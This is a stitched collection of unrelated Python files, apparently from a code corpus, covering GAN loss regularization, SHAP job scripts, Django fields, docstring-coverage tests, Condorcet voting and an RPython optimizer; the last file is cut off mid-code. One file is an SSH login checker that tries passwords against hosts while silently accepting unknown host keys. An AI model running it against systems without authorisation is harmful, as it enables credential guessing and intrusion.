gen_z_used.requires_grad = True
gen_img, gen_ws = self.run_G(gen_z_used, gen_c[:batch_size], sync=sync)
plz_noise = torch.randn_like(gen_img) / np.sqrt(gen_img.shape[2] * gen_img.shape[3])
with torch.autograd.profiler.record_function('plz_grads'), conv2d_gradfix.no_weight_gradients():
plz_grads = torch.autograd.grad(outputs=[(gen_img * plz_noise).sum()], inputs=[gen_z_used], create_graph=True, only_inputs=True)[0]
gen_z_used.requires_grad = False
plz_lengths = plz_grads.square().sum(-1).sqrt()
plz_mean = self.plz_mean.lerp(plz_lengths.mean(), self.plz_decay)
self.plz_mean.copy_(plz_mean.detach())
plz_penalty = (plz_lengths - plz_mean).square()
training_stats.report('Loss/plz_penalty', plz_penalty)
loss_Gplz = plz_penalty * self.plz_weight
training_stats.report('Loss/G/plz_reg', loss_Gplz)
with torch.autograd.profiler.record_function('Gplz_backward'):
(gen_img[:, 0, 0, 0] * 0 + loss_Gplz).mean().mul(gain).backward()
# Gplzsep: Apply path length regularization on z each dimension.
if do_Gplzsep:
with torch.autograd.profiler.record_function('Gplzsep_forward'):
batch_size = gen_z.shape[0] // self.pl_batch_shrink
gen_z_used = gen_z[:batch_size]
gen_z_used.requires_grad = True
gen_img, gen_ws = self.run_G(gen_z_used, gen_c[:batch_size], sync=sync)
plzsep_noise = torch.randn_like(gen_img) / np.sqrt(gen_img.shape[2] * gen_img.shape[3])
with torch.autograd.profiler.record_function('plzsep_grads'), conv2d_gradfix.no_weight_gradients():
plzsep_grads = torch.autograd.grad(outputs=[(gen_img * plzsep_noise).sum()], inputs=[gen_z_used],
create_graph=True, only_inputs=True)[0]
gen_z_used.requires_grad = False
plzsep_lengths = plzsep_grads.square().sqrt()
plzsep_mean = self.plzsep_mean.lerp(plzsep_lengths.mean(dim=0), self.plzsep_decay)
self.plzsep_mean.copy_(plzsep_mean.detach())
plzsep_penalty = (plzsep_lengths - plzsep_mean).square().sum()
training_stats.report('Loss/plzsep_penalty', plzsep_penalty)
loss_Gplzsep = plzsep_penalty * self.plzsep_weight
training_stats.report('Loss/G/plzsep_reg', loss_Gplzsep)
with torch.autograd.profiler.record_function('Gplzsep_backward'):
(gen_img[:, 0, 0, 0] * 0 + loss_Gplzsep).mean().mul(gain).backward()
# Gw1reg: Constrain first-layer w by different latent dimensions.
if do_Gw1reg:
with torch.autograd.profiler.record_function('Gw1reg_forward'):
w1 = getattr(self.G_mapping.module, f'fc{0}').weight # (out, z_in)
cur_device = w1.device
reg = self.get_w1reg_scale(w1, cur_device)
w1_sq = torch.sum(w1 * w1, dim=0) # (z_in)
loss_w1reg = torch.sum(w1_sq * reg, dim=0) * self.w1reg_lambda
training_stats.report('Loss/G/loss_w1reg', loss_w1reg)
with torch.autograd.profiler.record_function('Gw1reg_backward'):
loss_w1reg.mean().mul(gain).backward()
#----------------------------------------------------------------------------
| python |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import os
from pathlib import Path
from wildfires.utils import handle_array_job_args
try:
# This will only work after the path modification carried out in the job script.
from specific import (
CACHE_DIR,
SimpleCache,
get_model,
data_split_cache,
get_shap_values,
)
except ImportError:
"""Not running as an HPC job yet."""
def func():
# Used to re-compute specific failed jobs, `None` otherwise.
indices = [
2,
3,
6,
7,
14,
15,
16,
17,
19,
21,
22,
28,
29,
35,
36,
52,
53,
54,
55,
59,
60,
61,
62,
68,
69,
70,
71,
72,
73,
76,
81,
82,
83,
84,
94,
98,
99,
100,
101,
102,
103,
104,
105,
106,
107,
108,
109,
111,
112,
113,
114,
115,
116,
117,
118,
119,
123,
124,
125,
129,
130,
132,
133,
134,
135,
141,
142,
155,
156,
170,
171,
172,
173,
175,
176,
177,
178,
183,
184,
185,
186,
188,
189,
196,
201,
202,
203,
204,
220,
221,
222,
223,
224,
225,
226,
227,
228,
229,
230,
231,
232,
235,
236,
237,
238,
239,
240,
241,
245,
246,
252,
254,
255,
257,
258,
261,
262,
263,
264,
266,
267,
276,
277,
311,
312,
313,
314,
316,
319,
320,
321,
327,
328,
329,
330,
331,
332,
338,
341,
342,
343,
344,
369,
372,
373,
374,
375,
376,
377,
378,
379,
380,
381,
382,
383,
384,
385,
386,
387,
388,
393,
395,
396,
401,
402,
409,
410,
411,
412,
413,
414,
422,
423,
437,
438,
439,
440,
441,
444,
445,
447,
453,
454,
455,
456,
457,
459,
462,
470,
471,
472,
473,
508,
509,
510,
511,
512,
513,
514,
515,
516,
519,
520,
521,
522,
523,
524,
525,
526,
527,
528,
535,
536,
537,
539,
540,
543,
544,
545,
546,
548,
549,
]
index = int(os.environ["PBS_ARRAY_INDEX"])
if indices is not None:
index = indices[index]
print("Index:", index)
X_train, X_test, y_train, y_test = data_split_cache.load()
rf = get_model()
job_samples = 50
tree_path_dependent_shap_interact_cache = SimpleCache(
f"tree_path_dependent_shap_interact_{index}_{job_samples}",
cache_dir=os.path.join(CACHE_DIR, "shap_interaction"),
)
@tree_path_dependent_shap_interact_cache
def cached_get_interact_shap_values(model, X):
return get_shap_values(model, X, interaction=True)
cached_get_interact_shap_values(
rf, X_train[index * job_samples : (index + 1) * job_samples]
)
if __name__ == "__main__":
handle_array_job_args(
Path(__file__).resolve(),
func,
ncpus=1,
mem="7gb",
walltime="11:00:00",
max_index=221,
)
| python |
import aiohttp
import asyncio
import json
import time
from pydigitalstrom.client import DSClient
from pydigitalstrom.log import DSLog
class DSWebsocketEventListener:
def __init__(self, client: DSClient, event_name: str):
self._client = client
self._event_name = event_name
self._callbacks = []
self._ws = None
self._last_keepalive = None
def register(self, callback: callable):
self._callbacks.append(callback)
async def _get_cookie(self):
return dict(token=await self._client.get_session_token())
async def start(self):
session = await self._client.get_aiohttp_session(
cookies=await self._get_cookie()
)
url = f"wss://{self._client.host}:{self._client.port}/websocket"
self._ws = session.ws_connect(url=url)
async with self._ws as ws:
async for msg in ws:
if msg.type == aiohttp.WSMsgType.TEXT:
await self._handle_event(event=json.loads(msg.data))
else:
                    DSLog.logger.warning(f"DS websocket got unknown command: {msg}")
async def stop(self):
if self._ws is not None:
await self._ws.close()
self._ws = None
async def _handle_event(self, event: dict):
if "name" not in event:
return
if event["name"] == "keepWebserviceAlive":
self._last_keepalive = time.time() * 1000.0
# subscribed event
if event["name"] == self._event_name:
for callback in self._callbacks:
await callback(event=event)
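# Minimal usage sketch (the DSClient constructor arguments below are assumptions;
# consult the pydigitalstrom documentation for the real signature):
#
#   async def on_event(event):
#       print("received", event)
#
#   async def main():
#       client = DSClient(host="dss.local", port=8080, apptoken="...")  # hypothetical args
#       listener = DSWebsocketEventListener(client, event_name="callScene")
#       listener.register(on_event)
#       await listener.start()
#
#   asyncio.run(main())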
| python |
from django.core.exceptions import ObjectDoesNotExist
from django.db import models
class OrderField(models.PositiveIntegerField):
def __init__(self, for_fields=None, *args, **kwargs):
self.for_fields = for_fields
super().__init__(*args, **kwargs)
def pre_save(self, model_instance, add):
if getattr(model_instance, self.attname) is None:
# no current value
try:
qs = self.model.objects.all()
if self.for_fields:
# filter by objects with the same field values
# for the fields in "for_fields"
query = {field: getattr(model_instance, field) for field in self.for_fields}
qs = qs.filter(**query)
# get the order of the last item
last_item = qs.latest(self.attname)
                value = getattr(last_item, self.attname) + 1
except ObjectDoesNotExist:
value = 0
setattr(model_instance, self.attname, value)
return value
else:
return super().pre_save(model_instance, add)
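# Usage sketch (hypothetical models, not part of this module): order Module rows
# within their parent Course, so each new module automatically receives the next
# order value relative to its course.
#
#   class Course(models.Model):
#       title = models.CharField(max_length=200)
#
#   class Module(models.Model):
#       course = models.ForeignKey(Course, related_name='modules', on_delete=models.CASCADE)
#       title = models.CharField(max_length=200)
#       order = OrderField(blank=True, for_fields=['course'])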
| python |
# Copyright 2020 Lynn Root
"""Functional tests for interrogate/coverage.py."""
import os
import sys
import pytest
from interrogate import config
from interrogate import coverage
HERE = os.path.abspath(os.path.join(os.path.abspath(__file__), os.path.pardir))
SAMPLE_DIR = os.path.join(HERE, "sample")
FIXTURES = os.path.join(HERE, "fixtures")
IS_WINDOWS = sys.platform in ("cygwin", "win32")
@pytest.mark.parametrize(
"paths,conf,exp_results",
(
([os.path.join(SAMPLE_DIR, "empty.py"),], {}, (1, 0, 1, "0.0")),
(
[os.path.join(SAMPLE_DIR, "empty.py"),],
{"ignore_module": True},
(0, 0, 0, "0.0"),
),
([SAMPLE_DIR,], {}, (56, 26, 30, "46.4")),
([os.path.join(SAMPLE_DIR, "partial.py")], {}, (22, 7, 15, "31.8")),
(
[os.path.join(SAMPLE_DIR, "full.py"),],
{"ignore_nested_functions": True},
(17, 17, 0, "100.0"),
),
(
[os.path.join(SAMPLE_DIR, "partial.py"),],
{"ignore_nested_functions": True},
(20, 6, 14, "30.0"),
),
),
)
def test_coverage_simple(paths, conf, exp_results, mocker):
"""Happy path - get expected results given a file or directory"""
conf = config.InterrogateConfig(**conf)
interrogate_coverage = coverage.InterrogateCoverage(paths=paths, conf=conf)
results = interrogate_coverage.get_coverage()
assert exp_results[0] == results.total
assert exp_results[1] == results.covered
assert exp_results[2] == results.missing
assert exp_results[3] == "{:.1f}".format(results.perc_covered)
def test_coverage_errors(capsys):
"""Exit when no Python files are found."""
path = os.path.join(SAMPLE_DIR, "ignoreme.txt")
interrogate_coverage = coverage.InterrogateCoverage(paths=[path])
with pytest.raises(SystemExit, match="1"):
interrogate_coverage.get_coverage()
captured = capsys.readouterr()
assert "E: Invalid file" in captured.err
interrogate_coverage = coverage.InterrogateCoverage(paths=[FIXTURES])
with pytest.raises(SystemExit, match="1"):
interrogate_coverage.get_coverage()
captured = capsys.readouterr()
assert "E: No Python files found to interrogate in " in captured.err
@pytest.mark.parametrize(
"level,exp_fixture_file",
(
# (0, "expected_no_verbosity.txt"),
# (1, "expected_summary.txt"),
(2, "expected_detailed.txt"),
),
)
def test_print_results(level, exp_fixture_file, capsys, monkeypatch):
"""Output of test results differ by verbosity."""
monkeypatch.setattr(coverage.utils.OutputFormatter, "TERMINAL_WIDTH", 80)
interrogate_coverage = coverage.InterrogateCoverage(paths=[SAMPLE_DIR])
results = interrogate_coverage.get_coverage()
interrogate_coverage.print_results(
results=results, output=None, verbosity=level
)
captured = capsys.readouterr()
expected_fixture = os.path.join(FIXTURES, exp_fixture_file)
if IS_WINDOWS:
expected_fixture = os.path.join(FIXTURES, "windows", exp_fixture_file)
with open(expected_fixture, "r") as f:
expected_out = f.read()
assert expected_out in captured.out
@pytest.mark.parametrize(
"ignore_module,level,exp_fixture_file",
(
(False, 2, "expected_detailed.txt"),
(True, 2, "expected_detailed_no_module.txt"),
(False, 1, "expected_summary.txt"),
(True, 1, "expected_summary_no_module.txt"),
),
)
def test_print_results_ignore_module(
ignore_module, level, exp_fixture_file, capsys, monkeypatch
):
"""Do not print module info if ignore_module is True."""
monkeypatch.setattr(coverage.utils.OutputFormatter, "TERMINAL_WIDTH", 80)
conf = {"ignore_module": ignore_module}
conf = config.InterrogateConfig(**conf)
interrogate_coverage = coverage.InterrogateCoverage(
paths=[SAMPLE_DIR], conf=conf
)
results = interrogate_coverage.get_coverage()
interrogate_coverage.print_results(
results=results, output=None, verbosity=level
)
captured = capsys.readouterr()
expected_fixture = os.path.join(FIXTURES, exp_fixture_file)
if IS_WINDOWS:
expected_fixture = os.path.join(FIXTURES, "windows", exp_fixture_file)
with open(expected_fixture, "r") as f:
expected_out = f.read()
assert expected_out in captured.out
def test_print_results_single_file(capsys, monkeypatch):
"""Results for a single file should still list the filename."""
monkeypatch.setattr(coverage.utils.OutputFormatter, "TERMINAL_WIDTH", 80)
single_file = os.path.join(SAMPLE_DIR, "full.py")
interrogate_coverage = coverage.InterrogateCoverage(paths=[single_file])
results = interrogate_coverage.get_coverage()
interrogate_coverage.print_results(
results=results, output=None, verbosity=2
)
captured = capsys.readouterr()
expected_fixture = os.path.join(
FIXTURES, "expected_detailed_single_file.txt"
)
if IS_WINDOWS:
expected_fixture = os.path.join(
FIXTURES, "windows", "expected_detailed_single_file.txt"
)
with open(expected_fixture, "r") as f:
expected_out = f.read()
assert expected_out in captured.out
# I don't want to deal with path mocking out just to get tests to run
# everywhere
if not IS_WINDOWS:
assert "tests/functional/sample/" in captured.out
assert "tests/functional/sample/full.py" not in captured.out
else:
assert "tests\\functional\\sample\\" in captured.out
assert "tests\\functional\\sample\\full.py" not in captured.out
| python |
# Inspired by:
# https://codereview.stackexchange.com/questions/42359/condorcet-voting-method-in-oop-python
# and https://github.com/bradbeattie/python-vote-core/tree/master/pyvotecore
import sys
import os
import itertools
def main():
file = sys.argv[1]
if not os.path.isfile(file):
print("File path {} does not exist. Exiting...".format(file))
sys.exit()
vote_results = get_data_from_file(file)
print("The votes are {}.".format(vote_results))
choices, scores = build_dict(vote_results)
results = matches_choices(choices, scores)
print("Pairwise results are {}.".format(results))
# return elect_winner(choices, results)
print("The winner is {}.".format(elect_winner(choices, results)))
def get_data_from_file(filepath):
"""
Parses data from input file
"""
vote_results = []
with open(filepath, encoding='utf-8') as file:
for lines in file:
if lines.startswith('#'):
pass
elif lines in ['\n', '\r\n']:
pass
else:
                (one, two, three, four) = lines.split(None, 3)  # split into exactly four ranked choices
vote_results.append((one, two, three, four))
return vote_results
def build_dict(votes):
"""
Builds a dictionary of scores
for each permutation of two choices
"""
choices = set()
scores = dict()
for voting in votes:
for choice in voting:
choices.add(choice)
for pair in list(itertools.permutations(voting, 2)):
if pair not in scores:
scores[pair] = 0
if voting.index(pair[0]) < voting.index(pair[1]):
scores[pair] += 1
return choices, scores
def matches_choices(choices, scores):
"""
Analyzes dictionary of scores and
gives the winner of each pair of choices
"""
results = dict()
for match in list(itertools.combinations(choices, 2)):
reverse = tuple(reversed(match))
if scores[match] > scores[reverse]:
results[match] = match[0]
else:
results[match] = match[1]
return results
def elect_winner(choices, results):
"""
If a choice is a winner against
every other choice, declares winner.
Does not detect Condorcet cycles
"""
for choice in choices:
choice_score = 0
for result in results:
if choice in result and results[result] == choice:
choice_score += 1
if choice_score == len(choices) - 1:
return choice
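# Worked example (computed by hand, not executed by this script):
#   ballots = [('a', 'b', 'c', 'd'), ('a', 'c', 'b', 'd'), ('b', 'a', 'c', 'd')]
#   choices, scores = build_dict(ballots)
#   results = matches_choices(choices, scores)
#   elect_winner(choices, results)  # -> 'a', since 'a' wins every pairwise matchup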
if __name__ == '__main__':
main()
| python |
import os
import time
def cmd(cmdd):
    os.system(cmdd)
# Restart loop: clear the console and relaunch app.py every two seconds.
# Note that "cls" is Windows-only; the POSIX equivalent is "clear".
while True:
    time.sleep(2)
    cmd("cls")
    cmd("python app.py")
| python |
import getpass
import sys
from constants import cx_status
import paramiko
# setup logging
paramiko.util.log_to_file("/tmp/paramiko.log")
# Paramiko client configuration
UseGSSAPI = paramiko.GSS_AUTH_AVAILABLE
DoGSSAPIKeyExchange = paramiko.GSS_AUTH_AVAILABLE
class SilentPolicy(paramiko.MissingHostKeyPolicy):
"""
    Policy that silently accepts an unknown host key without adding it to the
    known hosts. This is used by `.SSHClient`.
"""
def missing_host_key(self, client, hostname, key):
pass
def try_login(hostname, port, username, password, verbose, timeout):
try:
client = paramiko.SSHClient()
client.load_system_host_keys()
client.set_missing_host_key_policy(SilentPolicy())
if verbose:
print("Trying to connect... {}/{}@{}:{}".format(username, password, hostname, port))
if not UseGSSAPI and not DoGSSAPIKeyExchange:
try:
client.connect(hostname, port, username, password,
timeout=timeout, banner_timeout=timeout, auth_timeout=timeout)
except paramiko.ssh_exception.NoValidConnectionsError:
# closed port
return cx_status.NOT_LISTENING
except paramiko.ssh_exception.AuthenticationException:
return cx_status.ERROR
except Exception:
try:
client.close()
except Exception:
pass
# filtered port
return cx_status.NOT_LISTENING
else:
raise ("not tested code")
try:
client.connect( hostname, port, username, gss_auth=UseGSSAPI, gss_kex=DoGSSAPIKeyExchange,
timeout=timeout, banner_timeout=timeout, auth_timeout=timeout)
except Exception:
password = getpass.getpass( "Password for %s@%s: " % (username, hostname))
try:
client.connect(hostname, port, username, password,
timeout=timeout, banner_timeout=timeout, auth_timeout=timeout)
try:
client.close()
except Exception:
pass
except Exception:
try:
client.close()
except Exception:
pass
return cx_status.ERROR
chan = client.invoke_shell()
chan.close()
client.close()
return cx_status.CONNECTED
except Exception as e:
print("*** Caught exception: %s: %s" % (e.__class__, e))
try:
client.close()
        except Exception:
pass
return cx_status.ERROR
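# Usage sketch (illustrative host and credentials only; cx_status comes from the
# project's constants module):
#   status = try_login("192.0.2.10", 22, "admin", "admin", verbose=True, timeout=5)
#   if status == cx_status.CONNECTED:
#       print("weak credentials accepted")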
| python |
# Utilities for reading score-files
import numpy as np
from utils.data_loading import readlines_and_split_spaces
def load_scorefile_and_split_to_arrays(scorefile_path):
"""
Load a scorefile where each line has multiple columns
separated by whitespace, and split each column to its own
array
"""
scorefile_lines = readlines_and_split_spaces(scorefile_path)
arrays = [np.array(column) for column in zip(*scorefile_lines)]
return arrays
def load_scorefile_and_split_scores(scorefile_path):
"""
    Load a scorefile with the following structure and
    return three arrays: target_scores, nontarget_scores and original_scores.
    Each line is
        is_target score [optional ...]
    where is_target is either "True" or "False" and score is a float.
"""
scorefile_lines = readlines_and_split_spaces(scorefile_path)
target_scores = []
nontarget_scores = []
original_scores = []
for score_line in scorefile_lines:
# Some trials are None (because files are missing).
# Skip them
if score_line[1] == "None":
continue
is_target = score_line[0] == "True"
score = float(score_line[1])
original_scores.append(score)
if is_target:
target_scores.append(score)
else:
nontarget_scores.append(score)
target_scores = np.array(target_scores)
nontarget_scores = np.array(nontarget_scores)
original_scores = np.array(original_scores)
return target_scores, nontarget_scores, original_scores
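# Usage sketch (the score file name is hypothetical); each line of the file looks
# like "True 1.234" or "False -0.567":
#   target, nontarget, all_scores = load_scorefile_and_split_scores("trial_scores.txt")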
| python |
import numpy as np
from numpngw import write_apng
# Example 5
#
# Create an 8-bit RGB animated PNG file.
height = 20
width = 200
t = np.linspace(0, 10*np.pi, width)
seq = []
for phase in np.linspace(0, 2*np.pi, 25, endpoint=False):
y = 150*0.5*(1 + np.sin(t - phase))
a = np.zeros((height, width, 3), dtype=np.uint8)
a[:, :, 0] = y
a[:, :, 2] = y
seq.append(a)
write_apng("example5.png", seq, delay=50, use_palette=True)
| python |
from django.apps import AppConfig
class TmplConfig(AppConfig):
name = 'tmpl'
| python |
from rpython.flowspace.model import Variable, Constant, Block, Link
from rpython.flowspace.model import SpaceOperation, FunctionGraph, copygraph
from rpython.flowspace.model import checkgraph
from rpython.flowspace.model import c_last_exception
from rpython.translator.backendopt.support import log
from rpython.translator.simplify import join_blocks
from rpython.translator.unsimplify import varoftype
from rpython.rtyper.typesystem import getfunctionptr
from rpython.rtyper.lltypesystem import lltype
from rpython.rtyper.lltypesystem.lloperation import llop
def virtualize_mallocs(translator, graphs, verbose=False):
newgraphs = graphs[:]
mallocv = MallocVirtualizer(newgraphs, translator.rtyper, verbose)
while mallocv.remove_mallocs_once():
pass
for graph in newgraphs:
checkgraph(graph)
join_blocks(graph)
assert newgraphs[:len(graphs)] == graphs
del newgraphs[:len(graphs)]
translator.graphs.extend(newgraphs)
# ____________________________________________________________
class MallocTypeDesc(object):
def __init__(self, MALLOCTYPE):
if not isinstance(MALLOCTYPE, lltype.GcStruct):
raise CannotRemoveThisType
self.MALLOCTYPE = MALLOCTYPE
self.check_no_destructor()
self.names_and_types = []
self.name2index = {}
self.name2subtype = {}
self.initialize_type(MALLOCTYPE)
#self.immutable_struct = MALLOCTYPE._hints.get('immutable')
def check_no_destructor(self):
STRUCT = self.MALLOCTYPE
try:
rttiptr = lltype.getRuntimeTypeInfo(STRUCT)
except ValueError:
return # ok
destr_ptr = getattr(rttiptr._obj, 'destructor_funcptr', None)
if destr_ptr:
raise CannotRemoveThisType
def initialize_type(self, TYPE):
fieldnames = TYPE._names
firstname, FIRSTTYPE = TYPE._first_struct()
if FIRSTTYPE is not None:
self.initialize_type(FIRSTTYPE)
fieldnames = fieldnames[1:]
for name in fieldnames:
FIELDTYPE = TYPE._flds[name]
if isinstance(FIELDTYPE, lltype.ContainerType):
raise CannotRemoveThisType("inlined substructure")
self.name2index[name] = len(self.names_and_types)
self.names_and_types.append((name, FIELDTYPE))
self.name2subtype[name] = TYPE
class SpecNode(object):
pass
class RuntimeSpecNode(SpecNode):
def __init__(self, name, TYPE):
self.name = name
self.TYPE = TYPE
def newvar(self):
v = Variable(self.name)
v.concretetype = self.TYPE
return v
def getfrozenkey(self, memo):
return 'R'
def accumulate_nodes(self, rtnodes, vtnodes):
rtnodes.append(self)
def copy(self, memo, flagreadonly):
return RuntimeSpecNode(self.name, self.TYPE)
def bind_rt_nodes(self, memo, newnodes_iter):
return newnodes_iter.next()
class VirtualSpecNode(SpecNode):
def __init__(self, typedesc, fields, readonly=False):
self.typedesc = typedesc
self.fields = fields # list of SpecNodes
self.readonly = readonly
def getfrozenkey(self, memo):
if self in memo:
return memo[self]
else:
memo[self] = len(memo)
result = [self.typedesc, self.readonly]
for subnode in self.fields:
result.append(subnode.getfrozenkey(memo))
return tuple(result)
def accumulate_nodes(self, rtnodes, vtnodes):
if self in vtnodes:
return
vtnodes[self] = True
for subnode in self.fields:
subnode.accumulate_nodes(rtnodes, vtnodes)
def copy(self, memo, flagreadonly):
if self in memo:
return memo[self]
readonly = self.readonly or self in flagreadonly
newnode = VirtualSpecNode(self.typedesc, [], readonly)
memo[self] = newnode
for subnode in self.fields:
newnode.fields.append(subnode.copy(memo, flagreadonly))
return newnode
def bind_rt_nodes(self, memo, newnodes_iter):
if self in memo:
return memo[self]
newnode = VirtualSpecNode(self.typedesc, [], self.readonly)
memo[self] = newnode
for subnode in self.fields:
newnode.fields.append(subnode.bind_rt_nodes(memo, newnodes_iter))
return newnode
class VirtualFrame(object):
def __init__(self, sourceblock, nextopindex,
allnodes, callerframe=None, calledgraphs={}):
if isinstance(allnodes, dict):
self.varlist = vars_alive_through_op(sourceblock, nextopindex)
self.nodelist = [allnodes[v] for v in self.varlist]
else:
assert nextopindex == 0
self.varlist = sourceblock.inputargs
self.nodelist = allnodes[:]
self.sourceblock = sourceblock
self.nextopindex = nextopindex
self.callerframe = callerframe
self.calledgraphs = calledgraphs
def get_nodes_in_use(self):
return dict(zip(self.varlist, self.nodelist))
def shallowcopy(self):
newframe = VirtualFrame.__new__(VirtualFrame)
newframe.varlist = self.varlist
newframe.nodelist = self.nodelist
newframe.sourceblock = self.sourceblock
newframe.nextopindex = self.nextopindex
newframe.callerframe = self.callerframe
newframe.calledgraphs = self.calledgraphs
return newframe
def copy(self, memo, flagreadonly={}):
newframe = self.shallowcopy()
newframe.nodelist = [node.copy(memo, flagreadonly)
for node in newframe.nodelist]
if newframe.callerframe is not None:
newframe.callerframe = newframe.callerframe.copy(memo,
flagreadonly)
return newframe
def enum_call_stack(self):
frame = self
while frame is not None:
yield frame
frame = frame.callerframe
def getfrozenkey(self):
memo = {}
key = []
for frame in self.enum_call_stack():
key.append(frame.sourceblock)
key.append(frame.nextopindex)
for node in frame.nodelist:
key.append(node.getfrozenkey(memo))
return tuple(key)
def find_all_nodes(self):
rtnodes = []
vtnodes = {}
for frame in self.enum_call_stack():
for node in frame.nodelist:
node.accumulate_nodes(rtnodes, vtnodes)
return rtnodes, vtnodes
def find_rt_nodes(self):
rtnodes, vtnodes = self.find_all_nodes()
return rtnodes
def find_vt_nodes(self):
rtnodes, vtnodes = self.find_all_nodes()
return vtnodes
def copynodes(nodelist, flagreadonly={}):
memo = {}
return [node.copy(memo, flagreadonly) for node in nodelist]
def find_all_nodes(nodelist):
rtnodes = []
vtnodes = {}
for node in nodelist:
node.accumulate_nodes(rtnodes, vtnodes)
return rtnodes, vtnodes
def is_trivial_nodelist(nodelist):
for node in nodelist:
if not isinstance(node, RuntimeSpecNode):
return False
return True
def bind_rt_nodes(srcnodelist, newnodes_list):
"""Return srcnodelist with all RuntimeNodes replaced by nodes
coming from newnodes_list.
"""
memo = {}
newnodes_iter = iter(newnodes_list)
result = [node.bind_rt_nodes(memo, newnodes_iter) for node in srcnodelist]
rest = list(newnodes_iter)
assert rest == [], "too many nodes in newnodes_list"
return result
class CannotVirtualize(Exception):
pass
class ForcedInline(Exception):
pass
class CannotRemoveThisType(Exception):
pass
# ____________________________________________________________
class MallocVirtualizer(object):
def __init__(self, graphs, rtyper, verbose=False):
self.graphs = graphs
self.rtyper = rtyper
self.excdata = rtyper.getexceptiondata()
self.graphbuilders = {}
self.specialized_graphs = {}
self.specgraphorigin = {}
self.inline_and_remove = {} # {graph: op_to_remove}
self.inline_and_remove_seen = {} # set of (graph, op_to_remove)
self.malloctypedescs = {}
self.count_virtualized = 0
self.verbose = verbose
self.EXCTYPE_to_vtable = self.build_obscure_mapping()
def build_obscure_mapping(self):
result = {}
for rinstance in self.rtyper.instance_reprs.values():
result[rinstance.lowleveltype.TO] = rinstance.rclass.getvtable()
return result
def report_result(self, progress):
if progress:
log.mallocv('removed %d mallocs so far' % self.count_virtualized)
else:
log.mallocv('done')
def enum_all_mallocs(self, graph):
for block in graph.iterblocks():
for op in block.operations:
if op.opname == 'malloc':
MALLOCTYPE = op.result.concretetype.TO
try:
self.getmalloctypedesc(MALLOCTYPE)
except CannotRemoveThisType:
pass
else:
yield (block, op)
elif op.opname == 'direct_call':
graph = graph_called_by(op)
if graph in self.inline_and_remove:
yield (block, op)
def remove_mallocs_once(self):
self.flush_failed_specializations()
prev = self.count_virtualized
count_inline_and_remove = len(self.inline_and_remove)
for graph in self.graphs:
seen = {}
while True:
for block, op in self.enum_all_mallocs(graph):
if op.result not in seen:
seen[op.result] = True
if self.try_remove_malloc(graph, block, op):
break # graph mutated, restart enum_all_mallocs()
else:
break # enum_all_mallocs() exhausted, graph finished
progress1 = self.count_virtualized - prev
progress2 = len(self.inline_and_remove) - count_inline_and_remove
progress = progress1 or bool(progress2)
self.report_result(progress)
return progress
def flush_failed_specializations(self):
for key, (mode, specgraph) in self.specialized_graphs.items():
if mode == 'fail':
del self.specialized_graphs[key]
def fixup_except_block(self, exceptblock):
# hack: this block's inputargs may be missing concretetypes...
e1, v1 = exceptblock.inputargs
e1.concretetype = self.excdata.lltype_of_exception_type
v1.concretetype = self.excdata.lltype_of_exception_value
def getmalloctypedesc(self, MALLOCTYPE):
try:
dsc = self.malloctypedescs[MALLOCTYPE]
except KeyError:
dsc = self.malloctypedescs[MALLOCTYPE] = MallocTypeDesc(MALLOCTYPE)
return dsc
def try_remove_malloc(self, graph, block, op):
if (graph, op) in self.inline_and_remove_seen:
return False # no point in trying again
graphbuilder = GraphBuilder(self, graph)
if graph in self.graphbuilders:
graphbuilder.initialize_from_old_builder(self.graphbuilders[graph])
graphbuilder.start_from_a_malloc(graph, block, op.result)
try:
graphbuilder.propagate_specializations()
except CannotVirtualize, e:
self.logresult(op, 'failed', e)
return False
except ForcedInline, e:
self.logresult(op, 'forces inlining', e)
self.inline_and_remove[graph] = op
self.inline_and_remove_seen[graph, op] = True
return False
else:
self.logresult(op, 'removed')
graphbuilder.finished_removing_malloc()
self.graphbuilders[graph] = graphbuilder
self.count_virtualized += 1
return True
def logresult(self, op, msg, exc=None): # only for nice log outputs
if self.verbose:
if exc is None:
exc = ''
else:
exc = ': %s' % (exc,)
chain = []
while True:
chain.append(str(op.result))
if op.opname != 'direct_call':
break
fobj = op.args[0].value._obj
op = self.inline_and_remove[fobj.graph]
log.mallocv('%s %s%s' % ('->'.join(chain), msg, exc))
elif exc is None:
log.dot()
def get_specialized_graph(self, graph, nodelist):
assert len(graph.getargs()) == len(nodelist)
if is_trivial_nodelist(nodelist):
return 'trivial', graph
if graph in self.specgraphorigin:
orggraph, orgnodelist = self.specgraphorigin[graph]
nodelist = bind_rt_nodes(orgnodelist, nodelist)
graph = orggraph
virtualframe = VirtualFrame(graph.startblock, 0, nodelist)
key = virtualframe.getfrozenkey()
try:
return self.specialized_graphs[key]
except KeyError:
self.build_specialized_graph(graph, key, nodelist)
return self.specialized_graphs[key]
def build_specialized_graph(self, graph, key, nodelist):
graph2 = copygraph(graph)
virtualframe = VirtualFrame(graph2.startblock, 0, nodelist)
graphbuilder = GraphBuilder(self, graph2)
specblock = graphbuilder.start_from_virtualframe(virtualframe)
specgraph = graph2
specgraph.name += '_mallocv'
specgraph.startblock = specblock
self.specialized_graphs[key] = ('call', specgraph)
try:
graphbuilder.propagate_specializations()
except ForcedInline, e:
if self.verbose:
log.mallocv('%s inlined: %s' % (graph.name, e))
self.specialized_graphs[key] = ('inline', None)
except CannotVirtualize, e:
if self.verbose:
log.mallocv('%s failing: %s' % (graph.name, e))
self.specialized_graphs[key] = ('fail', None)
else:
self.graphbuilders[specgraph] = graphbuilder
self.specgraphorigin[specgraph] = graph, nodelist
self.graphs.append(specgraph)
class GraphBuilder(object):
def __init__(self, mallocv, graph):
self.mallocv = mallocv
self.graph = graph
self.specialized_blocks = {}
self.pending_specializations = []
def initialize_from_old_builder(self, oldbuilder):
self.specialized_blocks.update(oldbuilder.specialized_blocks)
def start_from_virtualframe(self, startframe):
spec = BlockSpecializer(self)
spec.initialize_renamings(startframe)
self.pending_specializations.append(spec)
return spec.specblock
def start_from_a_malloc(self, graph, block, v_result):
assert v_result in [op.result for op in block.operations]
nodelist = []
for v in block.inputargs:
nodelist.append(RuntimeSpecNode(v, v.concretetype))
trivialframe = VirtualFrame(block, 0, nodelist)
spec = BlockSpecializer(self, v_result)
spec.initialize_renamings(trivialframe, keep_inputargs=True)
self.pending_specializations.append(spec)
self.pending_patch = (block, spec.specblock)
def finished_removing_malloc(self):
(srcblock, specblock) = self.pending_patch
srcblock.inputargs = specblock.inputargs
srcblock.operations = specblock.operations
srcblock.exitswitch = specblock.exitswitch
srcblock.recloseblock(*specblock.exits)
def create_outgoing_link(self, currentframe, targetblock,
